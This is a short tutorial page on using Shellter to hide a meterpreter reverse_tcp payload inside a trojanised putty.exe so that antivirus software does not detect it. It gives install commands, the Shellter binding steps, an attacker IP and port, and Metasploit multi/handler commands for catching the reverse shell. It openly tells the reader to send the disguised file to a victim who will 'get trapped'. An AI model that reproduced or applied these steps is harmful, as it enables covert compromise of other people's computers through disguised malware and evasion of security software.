Bypass Antivirus with Shelter

VirusComputer NetworkComputer Programming

Shellter is an active shellcode insertion tool. It effectively re-encodes payloads to bypass anti-virus software. Shellter embeds a 32-bit Windows application and the shellcode in such a way that it goes undetected by the AV software.

Installation

You can install Shellter directly on Kali by using the following command −

  • apt-get install shellter
  • apt-get install wine32

How to Bypass

  • Open shelter using wine app,
  • select the operation mode as 'a'.
  • choose an executable file and copy it to the Shellter folder. This is required to be done to bind Shellter with a .exe file. In our case, we have copied the putty.exe file to the Shellter folder and bound it with the shellter.exe file.
  • Choose the PE target as /root/Downloads/putty.exe
  • Binding process started, Press the Enter key to continue. You may see DisASM.dll file gets successfully created. Enable Stealth Mode by Y.
  • Then the payload from the list as meterpreter/reverse_tcp
  • Then, set LHOST 192.168.1.109 [Attacker IP] LPORT as 4444 and press Enter.
  • Finally the payload generated. Send the PuTTY.exe File to Victim’s Machine
  • Start a new terminal and hit these cmds to listen.
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost <IP>
  • set lport <port-no.>
  • exploit

Boom!!!!!!!!!!! When the victim clicks the putty.exe file which will appear as similar to original putty.exe and hence the victim will get trapped and we will get a meterpreter session. This file will be fully undetectable to any antivirus.

raja
Published on 23-Sep-2020 15:55:51
Advertisements